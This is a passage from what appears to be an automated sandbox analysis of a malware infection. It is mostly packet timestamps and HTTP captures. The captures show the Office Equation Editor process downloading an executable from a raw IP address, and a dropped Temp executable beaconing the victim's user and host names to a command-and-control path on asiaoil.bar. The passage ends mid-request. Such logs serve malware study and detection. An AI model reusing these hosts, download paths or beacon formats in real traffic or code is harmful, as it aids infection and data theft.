                        Feb 10, 2022 10:23:09.774934053 CET4922680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:09.790251017 CET8049226172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:10.691493034 CET4922780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:10.708048105 CET8049227172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:10.708574057 CET4922780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:10.711121082 CET4922780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:10.727528095 CET8049227172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:10.727674007 CET4922780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:10.744157076 CET8049227172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:10.805613041 CET8049227172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:10.805726051 CET8049227172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:10.805787086 CET4922780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:10.805805922 CET4922780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:10.822633982 CET8049227172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:11.728051901 CET4922880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:11.744455099 CET8049228172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:11.744544983 CET4922880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:11.750458956 CET4922880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:11.766900063 CET8049228172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:11.767074108 CET4922880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:11.783479929 CET8049228172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:11.894766092 CET8049228172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:11.894867897 CET8049228172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:11.897490025 CET4922880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:11.897532940 CET4922880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:11.913733959 CET8049228172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:12.807075977 CET4922980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:12.823569059 CET8049229172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:12.823920965 CET4922980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:12.826739073 CET4922980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:12.843334913 CET8049229172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:12.843465090 CET4922980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:12.859697104 CET8049229172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:12.954328060 CET8049229172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:12.954447985 CET4922980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:12.954464912 CET8049229172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:12.954515934 CET4922980192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:12.970663071 CET8049229172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:13.895229101 CET4923080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:13.912416935 CET8049230172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:13.912507057 CET4923080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:13.916424990 CET4923080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:13.934206963 CET8049230172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:13.934345961 CET4923080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:13.950593948 CET8049230172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:14.009248972 CET8049230172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:14.009340048 CET8049230172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:14.009408951 CET4923080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:14.011969090 CET4923080192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:14.028245926 CET8049230172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:14.909082890 CET4923180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:14.925277948 CET8049231104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:14.925461054 CET4923180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:14.928308964 CET4923180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:14.944431067 CET8049231104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:14.944510937 CET4923180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:14.960648060 CET8049231104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:15.005187035 CET8049231104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:15.005335093 CET4923180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:15.005564928 CET8049231104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:15.005635977 CET4923180192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:15.021523952 CET8049231104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:16.150099993 CET4923280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:16.166445017 CET8049232172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:16.166528940 CET4923280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:16.169338942 CET4923280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:16.185508966 CET8049232172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:16.185606003 CET4923280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:16.201792955 CET8049232172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:16.265043974 CET8049232172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:16.265171051 CET4923280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:16.265186071 CET8049232172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:16.265228987 CET4923280192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:16.281373024 CET8049232172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:17.403482914 CET4923480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:17.419680119 CET8049234104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:17.419934034 CET4923480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:17.425743103 CET4923480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:17.441916943 CET8049234104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:17.442059040 CET4923480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:17.458369017 CET8049234104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:17.529016018 CET8049234104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:17.529097080 CET8049234104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:17.529175043 CET4923480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:17.529278994 CET4923480192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:17.545625925 CET8049234104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:18.764775038 CET4923580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:18.780958891 CET8049235104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:18.781028032 CET4923580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:18.783854008 CET4923580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:18.800070047 CET8049235104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:18.800137043 CET4923580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:18.816421032 CET8049235104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:18.911052942 CET8049235104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:18.911097050 CET8049235104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:18.911189079 CET4923580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:18.911235094 CET4923580192.168.2.22104.21.49.244
                        Feb 10, 2022 10:23:18.927673101 CET8049235104.21.49.244192.168.2.22
                        Feb 10, 2022 10:23:19.820646048 CET4923680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:19.836930037 CET8049236172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:19.837807894 CET4923680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:19.840840101 CET4923680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:19.857043982 CET8049236172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:19.857125044 CET4923680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:19.873378038 CET8049236172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:19.945090055 CET8049236172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:19.945318937 CET8049236172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:19.945436954 CET4923680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:19.945489883 CET4923680192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:19.964643955 CET8049236172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:20.951410055 CET4923780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:20.967745066 CET8049237172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:20.967859030 CET4923780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:20.970686913 CET4923780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:20.986975908 CET8049237172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:20.987104893 CET4923780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:21.003457069 CET8049237172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:21.069719076 CET8049237172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:21.069746017 CET8049237172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:21.069941044 CET4923780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:21.069998026 CET4923780192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:21.086172104 CET8049237172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:22.053076982 CET4923880192.168.2.22172.67.197.66
                        Feb 10, 2022 10:23:22.069677114 CET8049238172.67.197.66192.168.2.22
                        Feb 10, 2022 10:23:22.069889069 CET4923880192.168.2.22172.67.197.66
                        Timestamp  Source Port  Dest Port  Source IP  Dest IP
                        Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        • 198.46.132.195
                        • asiaoil.bar
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        0 | 192.168.2.22 | 49165 | 198.46.132.195 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:21:50.261872053 CET | 0 | OUT | GET /windowSSH/.win32.exe HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 198.46.132.195
                        Connection: Keep-Alive
                        Feb 10, 2022 10:21:50.385209084 CET | 1 | IN | HTTP/1.1 200 OK
                        Date: Thu, 10 Feb 2022 09:21:50 GMT
                        Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                        Last-Modified: Thu, 10 Feb 2022 03:31:37 GMT
                        ETag: "480d4-5d7a1966fd8a9"
                        Accept-Ranges: bytes
                        Content-Length: 295124
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/x-msdownload
                        Data Ascii: r@u5x6Bq@D$,x6BuUUW0r@3@t$,VW,r@;tUUhWDr@Wq@uV.u9-@~?jj_;u49-,?BtW=`Ajx0ju%`At$0t$0h5x6BDr@t$0t$0S
                        Feb 10, 2022 10:21:50.497762918 CET15INData Raw: 14 08 89 45 f8 74 06 50 ff d7 89 45 f8 f6 46 14 04 5f 74 0a 50 ff 75 0c ff 15 3c 70 40 00 f6 46 14 10 74 21 8b 46 08 89 45 f4 8b 46 0c 85 c0 74 07 50 ff 15 44 70 40 00 8d 45 f4 50 ff 15 48 70 40 00 89 46 0c 8b 46 0c eb 02 33 c0 5e c9 c2 0c 00 55
                        Data Ascii: EtPEF_tPu<p@Ft!FEFtPDp@EPHp@FF3^UE\AuQup@u-M\A3]U}SVW]{0}|6B+9>Bs4j"ECueG}EK?@Ls


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        1 | 192.168.2.22 | 49166 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:21:59.753804922 CET | 312 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 176
                        Connection: close
                        Feb 10, 2022 10:21:59.770062923 CET | 312 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: 'ckav.ruAlbus704672ALBUS-PCk0DE4229FCF97F5879F50F8FD3K2qUq
                        Feb 10, 2022 10:21:59.836230040 CET | 313 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:21:59 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B14QjzK93WN7FMCRwgPdBoL4GvyuLTCNzn128gIE66EmvAljQdFfNPOn5qPxQ8nApBsPYHTSjURn1ssUf9vIO%2F1OL2%2BdI5plkWkZzNc4H79V9rsVWKoyCfjhFO%2FkqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4453c8e679137-FRA
                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        10 | 192.168.2.22 | 49175 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:11.483872890 CET | 328 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:11.500328064 CET | 328 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:11.594872952 CET | 329 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:11 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=thdM9Np%2FCdPYSURDbhixX%2FX8u4tEOLZU%2FvVuDbDE134sivqgwq%2BaJfoO5vJ0tXiBljYm%2FC%2F30qIj93fbRfKfXGvl%2BpAnC9Vf%2FlfUUZamRBGfzlQvLCoIxHh%2BgetLJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db44585da166940-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        11 | 192.168.2.22 | 49176 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:12.553925991 CET | 330 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:12.570199013 CET | 330 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:12.721690893 CET | 331 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:12 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BEFEhIgHNjdPe%2Fupr%2FEP7FioCKDN%2BQkotKPjVJOS%2Frml7qplaroEnTQz1FIinV2XsHaS%2FI7nUqbPdpg00nvPfbyrD1nl6xKScXbaQFyDSbzbSQdRqYsZkYL%2FaMhgSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4458c8c24904f-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        12 | 192.168.2.22 | 49177 | 104.21.49.244 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:13.627098083 CET | 332 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:13.643413067 CET | 332 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:13.718802929 CET | 333 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:13 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KXNvxjzVfF4hz0T9dBMVDpRewCBTbhWivG59MXcrMq3Fz0H3HqGx%2F5DX%2Bne%2B%2FFccTkhD5ws8ZgjI27n620j0vO0mLN2fs3T3gcOiTbX8ownTlbqimc3Co0pX0aSa4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445933dcd9247-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        13 | 192.168.2.22 | 49178 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:14.784465075 CET | 334 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:14.800611973 CET | 334 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:14.920140982 CET | 335 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:14 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NVUp%2BcxarDGGCShA6A3fVGNJKlQzMKQTikn%2FmGyj3943bP7FxgEz5bihNVsOHsU3DbxzwdZ03uFPNgUbs9%2F0oEhIIT0nnSYYifUkfynsl2OJVPJCYFOqol8oHQboIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db4459a7c04694c-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        14 | 192.168.2.22 | 49179 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:15.879811049 CET | 335 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:15.896128893 CET | 336 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:15.963191986 CET | 336 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:15 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YywndWPDbt1nWWBUZyOXzJTtQd6vv4%2FE1Tker%2B341XUrk33CDyk4IMaSDz5n%2BK2atL0VK3i5tDkfDiWK6GJ%2F3hUlhDHcf%2Fn6Pch6y%2FzzAYpnP5BzB5pzhQW97EcSSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445a1484f90e0-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        15 | 192.168.2.22 | 49180 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:17.221999884 CET | 337 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:17.238274097 CET | 337 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:17.311069012 CET | 338 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:17 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UjFRYEW1vf5tlCFa1f1vwHKik1aRVbAIBpy1RMsjGKnLW4Qrm9vJ89Nrs6dLqDWMcgVmBrYxiuG%2FUeCxjisf7RsLjasp6QzHWLM4TEeZkFdIUloz%2B3B9BJnC3ZRzZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445a9aa3b9249-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        16 | 192.168.2.22 | 49181 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:18.584774971 CET | 339 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
                        Content-Length: 149
                        Connection: close
                        Feb 10, 2022 10:22:18.601130009 CET | 339 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 34 00 36 00 37 00 32 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.ruAlbus704672ALBUS-PC0DE4229FCF97F5879F50F8FD3
                        Feb 10, 2022 10:22:18.688278913 CET | 340 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 10 Feb 2022 09:22:18 GMT
                        Content-Type: text/html; charset=UTF-8
                        Connection: close
                        Status: 404 Not Found
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KHC3Edk5h9AYeBTw4zi6GBAjPXoz6AEM7UyHRy8hW3je7zgNBBmtdwVwGpiSZh81JKEYltIiJgER6JT21WX3XjM2N0XFbkBnufuzgMA76%2Bp7Xcs80ietpmWj4LHaRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 6db445b23bfc8fec-FRA
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        17 | 192.168.2.22 | 49182 | 172.67.197.66 | 80 | C:\Users\user\AppData\Local\Temp\xmtxpy.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Feb 10, 2022 10:22:20.304832935 CET | 341 | OUT | POST //bobby/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: asiaoil.bar
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 579BFA72
